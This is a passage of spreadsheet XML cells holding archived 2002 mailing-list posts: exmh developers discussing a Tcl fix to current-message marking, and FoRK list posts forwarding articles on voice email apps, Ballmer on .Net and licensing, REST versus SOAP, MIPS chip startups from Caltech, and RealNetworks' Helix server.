        set msgid [Ftoc_MsgNumber [Ftoc_FindMsg $msgid $line]]
    }
    Ftoc_ClearCurrent
    Mh_SetCur $exmh(folder) $msgid
    Ftoc_ShowSequences $exmh(folder)The Ftoc_ClearCurrent calls Ftoc_RescanLIne to clear the '+' sign 
_before_ the on-disk transition is made. I hacked this stuff and more 
or less changed the order. It works, but fails on some folder changes.My feeling of this is that we really do not want to have a 
Ftoc_ClearCurrent, but rather just a RescanLine and the caller had 
better know the line or msgid. That routine shoud just put in the '+' 
if the line/msg in question happened to be the cur msg. Thoughts?
/Anders
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; &gt; &gt; My feeling of this is that we really do not want to have a 
&gt; &gt; &gt; Ftoc_ClearCurrent, but rather just a RescanLine and the caller had 
&gt; &gt; &gt; better know the line or msgid. That routine shoud just put in the '+' 
&gt; &gt; &gt; if the line/msg in question happened to be the cur msg. Thoughts?
&gt; &gt; 
&gt; &gt; Intuitively, that sounds right to me.  It does also call "tag remove", so 
&gt; &gt; you'll have to make sure that gets set correctly as well.
&gt; &gt; 
&gt; &gt; I think any changes that make it behave more intuitively are a good thing even 
&gt; &gt; if they mean we have something else to fix.  Of course, that attitude is why 
&gt; &gt; I've been fixing exmh bugs for 3 weeks.
&gt; 
I have a version that's working now. I'll try it a couple of days and 
check it during daylight. Basically I added an agument to 
ClearCurrent and updated all callers to slap in $ftoc(curLine). I 
also flipped the order in  Msg_Change to ClearCurrent $prevline after 
the Mh_SetCur. For some reason it barfs when Marking many messages 
Unread. I'll check that tomorrow.G'night./Anders_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
Look at my friend Jonathan's company, VOXEO.  Unless you're going 
to run out and build a platform that executes Voice XML code and 
can support IMAP etc. then the easiest way to do this is to 
leverage VOXEO's service.  You can start building on it for free 
and you will pay &gt; $0.10 per minute for the pleasure of 
using/testing the service.http://www.voxeo.comIf you have about $50K to throw at the project then you can look at 
NUANCE, which has a platform that combines VoiceXML/VXML, Speech 
Reco, and the L&amp;H speech synthesize, which will allow you to have 
your email read to you by Stephen Hawking.TellMe &amp; BeVocal have off-the-shelf services that do this, though, 
but from my testing, they suck.If I were to build this I'd spec a lightweight IMAP client and 
VoiceXML browser and dump them on VOXEO.However, you'll find this to be extremely slow and frustrating.  
Better to us a screen phone with a WAP client.-Ian.On Wednesday, July 17, 2002, at 09:53 PM, Mr. FoRK wrote:
&gt; I was talking to a friend today about voice applications - using a 
&gt; phone to
&gt; get mail or info (other things are possible, but that's what we talked
&gt; about).
&gt; He's running a mail server called X-Mail (or something) and it has 
&gt; a Web UI
&gt; written with some PHP pages. I made the comment that rending an inbox
&gt; listing with VoxML (or whatever the latest thing is) would be 
&gt; trivial &amp; with
&gt; a little playing around you could do a simple voice app to 
&gt; monitor &amp; admin
&gt; the mail server, or you could actually get/send mail this way.
&gt;
&gt; The hard part is hooking up to the phone system - how do I get a 
&gt; phone to
&gt; hit a 'voice app server' that hits the HTTP+VOX enabled mail server?
&gt; He'd want to give this back as open source, but there is no 
&gt; corresponding
&gt; open source voice server - or is there?
&gt;
&gt; I've looked at BeVocal - it seems that Talk2 is toast - does 
&gt; anybody know
&gt; how else this could be done?
&gt;
&gt; I'd love to see a digital answering machine with some speech 
&gt; recognition
&gt; built-in that would proxy into a personal computer for contact 
&gt; lists &amp; mail
&gt; &amp; whatnot. I could call /my/ home phone and bounce out to the web or do
&gt; whatever, without needing a publicly available voice server.
&gt;
&gt;
&gt; http://xent.com/mailman/listinfo/fork
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Rohit was wondering what Microsoft's definition of a Chief Software
Architect is (and, consequently, what Microsoft thinks is a roadmap).
Here you go, from Mr. Ballmer to Mr. Gillmor to Mr. FoRK...
Architecture is war; love 'em or hate 'em, at least Microsoft
understands that: as Chief SA, BillG oversees all product strategy."There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offerings."http://www.infoworld.com/articles/pl/xml/02/07/22/020722plballmer.xmlBallmer in charge 
July 18, 2002 1:01 pm PTNO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2002, Ballmer discussed the progress of .Net, changes
in the company's approach to product development, and Microsoft's
efforts to simplify product licensing and inspire trust in customers and
partners.&gt; Last time we talked was two years ago, at the beginning of the .Net
&gt; era. So where are we now in the .Net evolution?Let me start by talking about where I think we are in the XML revolution
first, and then [I will] talk about where we are with .Net. I believe
that the IT industry collectively decided over the last three or four
years that the world was going to be replatformed with XML as the key
foundation. It's not like anyone ever got together to decide this, but
it's like magnetic north, where it's been clearly indicated that
everyone is rallying around the concept. But I think the degree to which
[XML] is pervasive might still be underestimated. A lot of partners,
even at this conference, see it as b-to-b for big companies. But it is
really about the way software in general is designed. It is all about
the way security should work. Management -- everything is changed.So to answer your direct question, two years ago I might have said the
jury is still out about whether [XML] was going to happen. We were
questioning if it was going to be a legitimate competitor to Java. But
now the world has decided to embrace [XML] as the basis for the next
generation of technology. And there are a lot of benefits that come with
it. Could it have been something other than XML? Sure it could have. It
wasn't the specific technical implementation; it is merely the fact that
it comes out of Internet standards. It has deeper semantic abilities. It
is all about interoperability and connection.So in that context, where are we with .Net? I'll say a couple
things. No. 1, I would say we have some momentum in the market. We have
customers using the .Net product line, like Merrill [Lynch], Credit
Suisse, Marks &amp; Spencer, CitiBank, and a variety of others. People who
are doing some things for real. I feel like the degree we are out front
is in some ways smaller and in some ways larger.&gt; How so?Smaller in the sense that everyone is talking the XML talk, even Sun;
bigger in the execution sense: We've delivered. We delivered the first
batch of products that really were built XML to the core -- Visual
Studio .Net and BizTalk Server -- and we are getting traction. So I feel
good about where our execution is relative to everyone else. That is not
to say that other people aren't doing some reasonable bolt-on XML
support for the stuff they have.&gt; You have some heavy lifting to do to convince your customers and
&gt; partners to follow along. What do you have to do to set the standard
&gt; for adoption and upgrading to this next generation?We have to present the picture that we are behaving consistently within
the framework of focusing on customer issues and customer satisfaction
and trustworthy computing, which we have articulated. Now there are some
things I would have done differently, in 20-20 hindsight. I would have
increased the focus on not just security but deployment, because a lot
of the security problems are actually deployment problems. We have the
fix, but sometimes we can't get the tools in their hands to deploy those
fixes fast enough. Licensing -- I know I would have given more time, and
there are better ways to plan around the kinds of changes we made. We
are still going to have to get smart about the full ramifications.&gt; Do you expect any changes to be made between now and July 31 to
&gt; Licensing 6.0? There is a lot of push-back on this.No, there is nothing that will happen between now and July 31. And we
will continue to learn over time what we need to do to earn our
customers' trust and earn their business. I think many of the people who
are pushing back really don't even know the new terms.&gt; Isn't that your fault for not educating them?Yes, it is our fault. But you meet with plenty of customers whose
companies already have licenses, and they are saying, 'I think there's a
problem.' I don't deny there are some problems. I am sure there are some
issues we will have to work on over time.After July 31 we are going to see what the real issues are. I was
talking to a customer at the show who was saying he thought there would
be a problem, and I told him that we just completed a deal with his
company and that he is now universally licensed and that total costs to
his company are now lower than they were before. And he said, 'Oh really?'So we'll go through July 31. We have a lot of customers who have signed
licenses, and I am sure we are going to find some issues. My bigger
concerns today are probably not in the larger accounts, but there may be
some issues we need to address among the smaller-size companies, and we will.&gt; How does the .Net initiative change the way in-house client and server
&gt; developers work together? What we are trying to do for the health of .Net and the health of the
company and the sanity of the people who work there and the quality of
the products we produce is to have a more orchestrated, ï¿½ber-road map
of where we are going.Now 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offerings.&gt; It seems the scenarios construct is really working for you. Is this an
&gt; evolution of the solutions approach? I would say it is a pretty direct extrapolation from the solutions
stuff, only I think we are just getting a little more experience. I
think we use the word scenarios more often and solutions less, because
solution sounds more like a fixed thing. At the end of the day, most of
the things we do are customizable and programmable, and so people make
them into the solution they want. But they are still scenarios. What
will software deployment look like? Well, that is a scenario because it
involves Windows, Office, and other applications.We are working hard to make sure the whole is bigger than the sum of the
parts. That's not to say people are always comfortable with this. I
can't even say we will do it perfectly. All we have to do is do it a lot
better than we had been doing it. I think that would be a big step
forward for the customers.&gt; Will this approach cut down on some of the technology civil wars
&gt; Microsoft has had in the past involving who is going to gain control of
&gt; a project? This seems to be a very democratic approach to development.I would not use the word democracy to describe it. People have to come
together and ultimately make some decisions. This is not a voting
process here, the agenda of what we think is important. We get a lot of
input. [But] once it is decided, people don't get to vote with their feet.We try to make a quantum leap here in terms of our ability to improve
pulling together all the pieces. Our customers want us to do
that. Simplifying concepts by unifying them. The customers don't say
they want us to do that, but when we do do that, they go, 'Ahhh, I get
it. That makes sense.'I don't want to go to six more meetings where people say, 'Is your
workflow strategy BizTalk?' ... Or 'What's your Office workflow
strategy?' Or 'Why is synchronization in some ways better for e-mail and
Outlook than it is for file folders and Web pages?'To get that sort of synchronization sometimes -- to get that high-level
road map to work -- you have to build something we don't have today. So
we have been talking about unifying storage. And so the best way to get
all this stuff to work is to get them all to work just one way. Then you
just keep tuning one set of parameters instead of having a thousand
flowers blooming.&gt; In your Fusion keynote today, you talked about who your competitors
&gt; are, and it was the usual suspects. But one you didn't mention is
&gt; yourself. You are competing against the last generation of your technology.Always. Given that our stuff doesn't wear out or break down -- you can
question whether it breaks or not [Ballmer grins] -- but it doesn't
break down like machinery does. To get anyone to do something new, we
have to have something interesting and innovative.People think, OK, should we just do more upgrades or try to sell more
new product? We decided that users like us to do a level of systems
integration so they don't have to get involved in that. So take
Sharepoint Team Services, which we put in Office. We could have sold
Team Services as a separate product, and we could have introduced a new
SKU [stock keeping unit]. We could have decided if it should work down
level with the old Office or just the new version of Office, and we
could do that with real-time communications. But we tend to like to put
things together, integrate them, and then release batches?1202?-- which
are then 'upgrades' -- as a form of introducing our new innovation. But
no matter how you do it, because our stuff does not wear out, we have to
convince people that some idea we have is better or more powerful than
the older idea we had.And there are two aspects of doing that. One aspect is, on a given
product or upgrade release, does that make sense? Or do we convince you
that over an nyear period of time we will have enough innovation that
you will want to be licensed for that innovation. And this is part of
this whole licensing discussion we are having.We moved to the new licensing for two reasons, I would say. No. 1, we
wanted to simplify our licensing. When we look back a year from now, I
guarantee you that where we are now is simpler than where we
were. Nothing is simpler during a transition because they are learning
the new and are more familiar with the old, but I think people will
eventually realize this is simpler. Our licensing got pretty complicated
over the years, and some people came to not understand it all.The other issue is [the timing of delivering] our innovation. I don't
want to have a lot of rough questions [from customers]. So when we do
have new ideas, it's like, OK, should we put it in this upgrade or that
one or just have a stream of stuff that only our best customers have
access to under the terms of their contract? I think in the long run we
have a better chance of satisfying them with the latter than with
hitting them with six different upgrades. I am a fan of [letting] the
customer decide, OK, I want that piece or this piece. But they are
licensed for all of it. So those are the two things we sought to do.&gt; That gets back to the trust issue, where if you front-load it, that's
&gt; the big, lumpy upgrade; and if you back-load it with the vision, the
&gt; .Net 2003 servers, you have a long gap in the middle where you have to
&gt; sell into an untrusting audience.The truth is, we need to be better at both. There are some things you
can only do big and lumpy, like a new file system. It's not like some
sort of small user feature; if you change the file system, then the
storage, the backup, probaby those things are going to change. Probably
the shell ought to change.The applications ... a lot of things are going
to change. Can you call that lumpy? Or you can put out four new features
in PowerPoint, sure -- that would not look lumpy to users.I think we have to build trust in the model, and we are going to have to
deliver more over time. It will not come overnight. People will have to
see that we do a few things, ... that not all of our innovation is
lumpy, that more of it comes evenly and steadily. People develop a
confidence and faith; they like both aspects of the model. Over time,
our support needs to become more intimately involved in that story.We know that, but we don't know exactly what that means yet. And this
whole notion of software as a service -- this is not a licensing or
business discussion. It's how does software get rearchitected in the
world of the Internet? I mean, how many software products are
fundamentally different because of the Internet? Not many. Probably the
anti-virus guys keep up the best. They are always feeding new virus
support in. I asked the audience [at Fusion] how many use Windows
Update. Now that's a small piece of software, but it is big. That's the
consumer market; we've got to get that to really purr in the corporate market.&gt; The lack of broadband build-out and adoption seems to be holding up
&gt; the ability for users to take advantage of some new services you're
&gt; talking about. When Bill [Gates] invested in Comcast cable, it
&gt; triggered the Baby Bells to get on board with DSL. What are you doing
&gt; now to deal with that issue?The No. 1 thing is, we have to make software that is so compelling that
people will start saying, 'Well, of course I am going to get broadband.'&gt; And 802.11 is one of those compelling features?Yes, it is. I was in a hotel in Sun Valley, [Utah], this week that was
not wired. So I turned on my PC, and XP tells me there is a wireless
network available. So I connect to something called Mountaineer. Well, I
don't know what that is. But I have a VPN into Microsoft; it worked. I
don't know whose broadband I used. I didn't see it in Bill's room. I
called him up and said, 'Hey, come over to my room.' So soon everyone is
there and connecting to the Internet through my room.We have to support all the modalities, whether it is GPRS [General
Packet Radio Service] or 802.11. We have to make it easy to provision
from a software perspective for things that go on with DSL [and] cable
modems. ... And the software has to want a broadband link. There are not
many things you do where you say I really care about the performance. If
I am downloading PowerPoint files, then I want broadband. So when you
can do things with speed that you otherwise can't do without speed, that
is going to put a lot of pressure on the broadband community.That's the weird answer. The more normal answer is, yeah, isn't it
awful: There is not enough broadband, and the prices they charge ... . I
agree with all that. If you look at what happened in Japan recently,
there was a big drop -- it is now $25 a month for DSL. Vroom. They have
gone from almost no DSL connections a year ago to 1.5 [million] or 1.8
million [subscribers].&gt; So how do we make that happen in this country?I think that is beyond us. If there is enough interest where the
consumers are looking intensely for broadband, whether it is at today's
prices or tomorrow's prices, that is going to shake out the
marketplace. And I think the marketplace will do a good job. We just
have to make it something obvious that consumers want. Now I happen to
live in a neigborhood where there is no broadband network. No DSL or
cable modems. Well, I have a neighbor, [Teledesic chairman and co-CEO]
Craig McCaw, who has a wireless network that I think I can piggyback off
of [Ballmer laughs]. So, yes, broadband is a bottleneck -- but I also
think we have to look at oursleves as a software industry and say,
'Aren't we, too, some of that bottleneck?' We have not built software
that makes broadband a must-have.&gt; Microsoft CEO weighs in
&gt; 
&gt; Ballmer addresses a number of key issues for customers and partners.
&gt; 
&gt; On security and trust: "There are some things I would have done
&gt; differently."
&gt; 
&gt; On coordinating product groups: "We are working hard to make sure
&gt; the whole is bigger than the sum of the parts."  
&gt;
&gt; On product licensing: "We are still going to have to get smart
&gt; about the full ramifications." 
----
aDaM@XeNT.CoM -- long .sig alert!I believe it is quite possible to productively apply both supposedly
incompatible approaches [REST &amp; SOAP] together.  I'll sketch it out
below, both in prescriptive form.  Note: while this is proscriptive, it
is expected that local adaptations will be provided.1. Start by modeling the persistent resources that you wish to expose.
By persistent resources, I am referring to entities that have a typical
life expectancy of days or greater.  Ensure that each instance has a
unique URL.  When possible, assign meaningful names to resources.2. Whenever possible, provide a default XML representation for each
representation.  Unlike traditional object oriented programming
languages where there is a unique getter per property, typically there
will be a single representation of the entire instance.  These
representations will often contain XLinks (a.k.a. pointers or
references) to other instances.3. Now add high level methods which take care of all composite create,
update, and delete operations.  A key aspect of the design is that
messages for these operations need to be self contained - both the
sender and receiver should be able to make the absolute minimum of
assumptions as to the other's state, and multiple requests should not be
required to implement a single logical operation.  All requests should
provide the appearance of being executed atomically.4. Query operations deserve special consideration.  A general purpose
XML syntax should be provided in every case.  In addition, when a
reasonable expectation exists that query parameters will be of a
relatively short size and not require significant encoding, then a HTTP
GET with the parameters encoded as a query string should also be
provided.Implications  The following table emphasizes how this unified approach differs from
the "pure" (albeit hypothetical) different positions described above.1. Resource -- POST operations explicitly have the possibility of
modifying multiple resources.  PUT and DELETE operations are rarely
used, if ever.  GETs may contain query arguments.2. Get -- GETs must never be used for operations which observably change
the state of the recipient.  POST should be used instead.3. Message -- Do not presume that URLs are static, instead presume that
they identify the resource.  In particular, recognize that URLs can be
dynamically generated.  Expect URLs of other SOAP Resources in
responses.  Use the SOAP Response MEP for pure retrieval operations.4. Procedure -- Treat the URL itself as the implicit first parameter.
Allow URLs to be dynamically generated, and returned in structures.  Use
HTTP GET for retrieval operations.Conclusions  Looking to the future, the application level inter-networking protocols
that emerge today will likely be the application level intra-networking
protocols of the next decade.  Both REST and SOAP contain features that
the others lack.  Most significantly:REST - SOAP = XLinkThe key bit of functionality that SOAP applications miss today is the
ability to link together resources.  SOAP 1.2 makes significant progress
in addressing this.  Hopefully WSDL 1.2 will complete this important work.SOAP - REST = Stored ProceduresLooking at how other large scale systems cope with updates provides some
key insights into productive areas for future research with respect to REST.Finally, it bears repeating.  Just because a service is using HTTP GET,
doesn't mean that it is REST.  If you are encoding parameters on the
URL, you are probably making an RPC request of a service, not retrieving
the representation of a resource.  It is worth reading Roy Fielding's
 thoughts
on the subject.  The only exception to this rule that is routinely
condoned within the REST crowd is queries.  -- Sam Ruby, http://radio.weblogs.com/0101679/stories/2002/07/20/restSoap.html
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"In fact, Caltech says that it actually spun out the same number of
startups in 2001 -- a poor time, needless to say, for new ventures -- as
it did in the boom year of 1999."  Oookaaaay...
http://www.fulcrummicro.com/press/article_eeTimes_05-08-02.shtmlIconoclast designers choose MIPS
By Anthony Cataldo
May 28, 2002  SAN JOSE, Calif. -- A group of engineers in Calabasas Hills, CA wants to
turn the microprocessor world on its head by doing the unthinkable:
tossing out the clock and letting the signals move about unencumbered.
For those designers, inspired by research conducted at nearby Caltech,
clocks are for wimps.The Fulcrum Microsystems Inc. design team isn't the first to propose an
asynchronous processor, but president and chief executive officer Robert
Nunn wants to be the first to take a clockless, fire-breathing processor
mainstream. "We really deal with an asynchronous world," he said. "We
only make it synchronous for our own convenience."This is the kind of stuff that many in the processor industry would
consider lunatic fringe, too weird for conservative embedded-systems
designers. But the young processor company and more than a dozen others
like it are anchored in the mainstream courtesy of the MIPS
instruction-set architecture. More and more, MIPS is becoming the choice
for maverick processor design teams seeking a place at the high end by
fielding unorthodox devices. And if Motorola and IBM in the PowerPC camp
aren't careful, they could see their performance leadership in the
high-end embedded-processor market snatched away by some of these upstarts.In Austin, Texas, meanwhile, designers at another MIPS house, Intrinsity
Inc., aren't prepared to ditch the clock. But they are putting a new
spin on some old tricks such as giving each gate its own clock and then
letting them overlap. Using such sleight of hand, the company hopes to
soon deliver RISC-based processors that run at an eye-popping 2 GHz and
consume just 10 to 15 watts.Fulcrum, Intrinsity and their brethren may once have been written off as
interesting experiments, backed by venture capitalists who overlooked
some of the finer details, like software compatibility. What lends them
respectability is MIPS.Theirs for the asking One reason young processor companies seem to be flocking to the platform
is that its steward, MIPS Technologies Inc., has no qualms about
licensing the instruction-set architecture (ISA), provided that the
licensee agrees to meet a software-compatibility test suite. By
contrast, processor-core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405 PowerPC from IBM.The MIPS ISA is also one of the simplest forms of
reduced-instruction-set computing around, which tends to make it
attractive to processor designers interested in extending the
architecture. It was this and the wide availability of tools and
software that drew Intrinsity to MIPS, even though the company is aiming
at PowerPC sockets, as evidenced by its decision to adopt the RapidIO
interface instead of HyperTransport, which has been favored by MIPS vendors.Good fit "It's a nice, clean architecture and has an open model that allows us to
add instructions," said Paul Nixon, chief executive officer of
Intrinsity.  "You also get all the third-party tools that very easily
fit into our base of platforms."There was a time when this openness was seen as a liability for MIPS. In
the mid-1990s, before MIPS was spun out from Silicon Graphics Inc., the
instruction set lacked a multiply-add instruction, so some MIPS vendors
took it upon themselves to create their own. The problem was that this
broke many of the development tools, causing headaches for compiler
vendors like Green Hills Software Inc."We went to MIPS and said we have 20 different compiler variants and
it's embarrassing," said Craig Franklin, vice president of engineering
at Green Hills and a respected microprocessor industry veteran. Franklin
also wasn't shy about telling MIPS it needed to revamp its embedded
application binary interface. "We went to MIPS and said we've done a
dozen EABIs, let's clean up yours," he said.MIPS took the advice and wasted little time clamping down on
architectural deviations, observers said. But the MIPS camp still has to
live with a legacy of incompatible chips in the field. "To its credit,
MIPS quickly caught on," said Jim Turley, a microprocessor industry
analyst. "Going forward, MIPS is maintaining good control but they are
still haunted by incompatibility among multiples."If the biggest risk to the MIPS camp is fragmentation, then the PowerPC
camp has the opposite problem: architectural confinement. Though the
PowerPC architecture carries the cachet of household names Motorola and
IBM, these are essentially the only two companies that provide
PowerPCs. It's not for lack of interest. Rather, the companies have been
reluctant to cede control over the architecture. This could wind up
hurting the PowerPC cause, though."To get a PowerPC license is impossible or very expensive," Green Hills'
Franklin said. "Tactically this may have been a mistake. If you're a
Japanese company, all things being equal, you'd rather buy from another
Japanese company."Analyst Turley, too, thinks the PowerPC camp will only stand to gain by
licensing the architecture. "It's all about software compatibility and
tool support. The more you can proliferate the architecture the better
you're going to do," he said. "I don't think Motorola and IBM can
address the entire market by themselves."There's a chance that this could change. IBM, for its part, is in the
process of planning an expansion strategy for PowerPC that may involve
more licensing. Though it's unlikely the PowerPC camp will ever have the
open licensing model of MIPS Technologies, MIPS processor vendors may
have more than just two competitors to worry about."We're certainly not averse to [licensing]," said Lisa Su, director of
PowerPC products at IBM. "The question is, how much do we do and who do
we license to. There are various ways you could go, whether it's a hard
core, soft core or licensing the ISA."But the fear of architectural fragmentation still looms large. "We know
that if we have different microarchitectures we have to do work on
software compatibility," Su said. "With MIPS there's a degree of
fracturing. That may not always be a big problem, but if you go to other
markets -- like consumer -- it becomes big. Our belief is there is a
happy medium."Whatever path IBM takes it will act in its own best interest as a chip
provider, not as a company that wants to hawk intellectual
property. This is why the Xilinx licensing deal works for IBM: Big Blue
is not so much interested in the royalties and fees it collects from
Xilinx, but in the dual benefit of widening the appeal of the
architecture and the revenue IBM generates from manufacturing the FPGAs
for Xilinx in its own fabs. "We're not trying to make money off of
licensing," Su said.Manufacturing is probably one of the most powerful weapons that PowerPC
vendors IBM and Motorola wield. Both have gussied up their high-end
lines with copper interconnect and silicon-on-insulator technology,
still rarities among chip makers. This has helped both companies design
relatively low-power embedded processors running at 1 GHz that are
shipping today. IBM did it using 0.13-micron design rules and a
four-stage pipeline; Motorola is using 0.18-micron design rules and a
seven-stage pipe.The companies say there's more performance headroom in store. "When we
get to 0.13 micron we'll get substantially faster," said Raj Handa,
PowerPC and PowerQuicc marketing manager at Motorola.Proprietary processes Most MIPS processor vendors, by contrast, rely on mainstream foundries
that haven't developed the more-exotic process technologies. And even
though companies like Motorola are shifting more capacity to outside
foundries, they're keeping their special process recipes in-house to
juice up their high-performance devices.Lacking this capability, most MIPS processor vendors will have little
choice but to come up with dazzling architectural feats to keep up their
chops at the high end. It should become clear in the next year or so how
some of the newer players measure up.Intrinsity hopes to field its 2-GHz processors by the end of the
year. Fulcrum is shooting for an early 2003 introduction. "We're going
to shock the industry in terms of raw performance and speed-vs.-power
performance," Fulcrum's Nunn said. "We really want to change the way the
world designs semiconductors."http://www.fulcrummicro.com/press/article_fastco_04-02.shtmlThe Pasadena startup machine
By Alison Overholt
April, 2002  There was a time when every dorm room, it seemed, was a startup waiting
to happen. Throughout the 1990s, kids cobbled together business plans
between classes, won funding, and jumped into business. Risk? What risk?
Plunging into a new venture seemed all too easy.Ah, the fickleness of youth. These days, most of the kids are back in
class. Venture capitalists say that they're seeing precious few
proposals out of MIT, Stanford, and almost every other university, save
one: the California Institute of Technology.In fact, Caltech says that it actually spun out the same number of
startups in 2001 -- a poor time, needless to say, for new ventures -- as
it did in the boom year of 1999. While startup enthusiasm has faded on
most campuses, Caltech has blossomed into a robust new-company machine.This didn't happen by accident. During the past seven years, Caltech's
Office of Technology Transfer has carefully developed a strategy for
cultivating commerce. "We focus on nurturing entrepreneurs
scientifically more than other schools do," says Rich Wolfe, the
office's associate director. That is, the university focuses more on the
science itself than on the ensuing commercial opportunity.That's what grabbed Uri Cummings and Andrew Lines, two PhD students at
Caltech who founded Fulcrum Microsystems in 2000. "There is a pervasive
philosophy at Caltech that no problem is unsolvable," Cummings
says. "There's a focus on scientific ingenuity that is thrilling to be
around. Caltech has so many entrepreneurs because the school doesn't
make it about business or focus on how much money they'll get out of
it. Caltech is a catalyst, moving technology from the university out
into industry, and students are thrilled to be a part of it."Before starting Fulcrum, Cummings and Lines worked for six years with
Caltech computer-science professor Alain Martin on an
asynchronous-circuit design for semiconductor chips. They ventured into
commercialization while still in the throes of their doctoral program.That they could afford to do that points to another, more practical
aspect to Caltech's approach. Other universities typically require
entrepreneurs to pay up-front application and licensing fees for the use
of technology patents. But Caltech believes that such payments stifle
entrepreneurship, since young companies usually have little cash to
spare. Instead, the school typically takes equity stakes in startups,
and it defers collection of patent payments until fledgling companies
are financially secure.For Caltech, it's a long-term bet. "The reality is that universities
rely far more on their endowments than they could on any fees to be
collected from the initial licensing process," Wolfe says. "So we seek a
bite of the apple -- and we hope that if one of these entrepreneurs
founds the next Intel, he'll not only share the equity but also bestow a
gift on the university in remembrance that we took care of him when he
was just getting started."Cummings and Lines may be in a position to do just that. Fulcrum has won
about $20 million in venture funding amid the toughest venture market in
recent history. Its founders have hired a credible CEO, Bob Nunn, who
formerly ran Vitesse's telecom division, and hired 24 top students from
their alma mater. And they've garnered rave reviews of their chip design
from technology journals.One thing that Cummings and Lines haven't done yet: finished their
degrees. Officially, both are now "on leave." They may not be back.----
aDaM@XeNT.CoM
High-tech startups fail for only three reasons: stupidity, luck, and greed. Tip one for would-be entrepreneurs: Avoid stupid and unlucky people. If
you are stupid or have bad luck, don't start a high-tech business.Tip two for would-be entrepreneurs: Do a product that you want to do,
not one that they want you to do.Startup founders generally have only ideas, charisma, and equity to work
with. Ideas and charisma are cheap, but equity is expensive.  To make a
start-up work, the founder has to divvy out parts of the business at
just the right rate to keep everyone happy until the product is a
success. Give away too much of your company too soon to a venture
capitalist, to your co-workers, or even to yourself, and you risk
running out of distributable shares before the product is done. And that
probably means the product won't be done. Ever.Tip three for would-be entrepreneurs: Don't take venture funding too soon. If you are doing a software product, don't take venture money until you
need it to introduce the product.  Don't take venture money until you
have used up all of your own money, your mother-in-law's money, and
everything you can borrow.Bootstrap. Rent, don't buy. Don't hire people to do things you can
contract out because contractors don't require stock options.As the founder, the man or woman with the grand plan, your function is
to manage the distribution of your own holdings so that you end up with
fewer shares but more wealth.Tip four for would-be entrepreneurs: Invite me to lunch. I'm a cheap date.  -- Robert X. Cringely, http://www.pbs.org/cringely/pulpit/pulpit20010614.html
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">"This is a very tenuous time for Microsoft," Gartenberg said. "This is
not a time in Microsoft's history when it can be seen as trying to do to
Real what it did to Netscape."   Rrrrrrriiiiiight....http://www.nytimes.com/2002/07/22/technology/22REAL.htmlJuly 22, 2002
RealNetworks Poses Challenge to Microsoft
By JOHN MARKOFFSAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
RealNetworks plans to announce a new version of its software on Monday
that can distribute audio and video in a range of formats, including
Microsoft's own proprietary Windows Media.The new software is intended for large media companies and other
corporations that need to send audio and video data to customers and
employees in a variety of different formats. But RealNetworks
acknowledged that it was possible that the company might incur
Microsoft's legal wrath.Nevertheless, Rob Glaser, a former Microsoft executive who founded
RealNetworks as Progressive Networks in 1994, said he believed the
strategy was good for both Microsoft and consumers."A rational way for them to respond would be to say, `This is great,' "
he said. "That would be Microsoft of the future."Mr. Glaser said his company, based in Seattle, had developed a version
of the Microsoft Media Server software that comes with the Windows
operating system.He said RealNetworks' engineers had studied the data that was sent
between the Microsoft media server software and the Windows Media Player
program and recreated the technology needed to play files in the
Microsoft format. This method created a so-called clean-room version,
meaning the developers built the transmission software without any
knowledge about the underlying program.Microsoft has adopted a similar strategy at several junctures,
Mr. Glaser said, reverse-engineering technologies like NetWare,
PostScript and JavaScript at different times.Microsoft executives said the company currently licensed the Windows
Media Player technology to a variety of companies including Yahoo,
RealNetworks and the America Online unit of AOL Time Warner. But a
Microsoft executive said that a clean-room copy of the Windows server
technology could lead to quality and performance issues."It's kind of hard to speculate about the technology until we see it,"
said Dave Fester, the general manager of the Windows Media division. If
a company has not licensed the server software, he added, "we would need
to look at it and see what they're doing."RealNetworks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Microsoft's decision to build an Internet browser into Windows
and give it away at no additional cost led directly to a bitter
antitrust lawsuit brought by the Justice Department in 1997.RealNetworks, which was a pioneer in the market for streaming media to
desktop personal computers, has been under growing pressure from
Microsoft, which is giving away both the server and Windows Media Player
program as part of its operating strategy. RealNetworks also faces
challenges from Apple Computer, which offers the QuickTime media player
as a part of its Macintosh OS X operating system and sells a more
full-featured player.Moreover, in recent months Macromedia Inc., which makes the Flash
animation software used on many Web sites, has added video capabilities
to its technology, making it a potential rival.RealNetworks is gambling that with a proliferation of different
standards and formats for video and audio, the media corporations that
make content available over the Internet will flock to a single system
that supports multiple types of data. The company is trying to shift the
focus of the competition from the PC desktop to the server, according to
analysts.Several analysts said the RealNetworks shift in strategy could put
Microsoft on the defensive."Real has got the experience and sophistication to pull this off," said
Richard Doherty, the president of Envisioneering, a market research and
consulting firm based in Seaford, N.Y. "It will open up a new horse race."Until now the companies have been engaged in a technology war to rapidly
increase the power and quality of each of their media players. At the
same time, they have competed over which of the programs are placed on
the desktops of personal computer users. RealNetworks claims to have
700,000 subscribers for pay services, but it is perceived as being
increasingly vulnerable, according to some analysts, because Microsoft
has included its Media Player as part of the Windows operating system,
which dominates the PC market.There are dozens of data formats for playing audio and video on the
Internet, but the dominant ones are RealAudio and RealVideo from
RealNetworks, QuickTime from Apple, Windows Media from Microsoft and the
industry digital movie standards MPEG-2 and MPEG-4.Microsoft and RealNetworks are currently locked in a close race for
desktop media player leadership. In the first quarter of this year,
according to survey data collected by Jupiter Research, a market
research firm based in New York, RealNetworks' RealOne Player had a 29.1
percent share of media players, while Microsoft's Windows Media Player
had a 28.2 percent share. Apple's Quicktime player was third, with a
12.2 percent.The new server software from RealNetworks is part of a version of the
company's media server that is to be introduced on Monday and which will
be called the Helix Universal Server. RealNetworks said it would offer
performance data based on a test it financed at an independent testing
service, KeyLabs, that indicate that the Helix software can, under some
conditions, deliver up to four times the speed of the Windows Media
Server in Microsoft's operating system. (Software servers are programs
that run on powerful computers and can send streams of digital
information to many computer users simultaneously.)At a news conference scheduled to be held in San Francisco, RealNetworks
is also expected to announce that it plans to make the Helix software
available as part of a strategy known as community source, which will
make it possible for RealNetworks partners and competitors to take
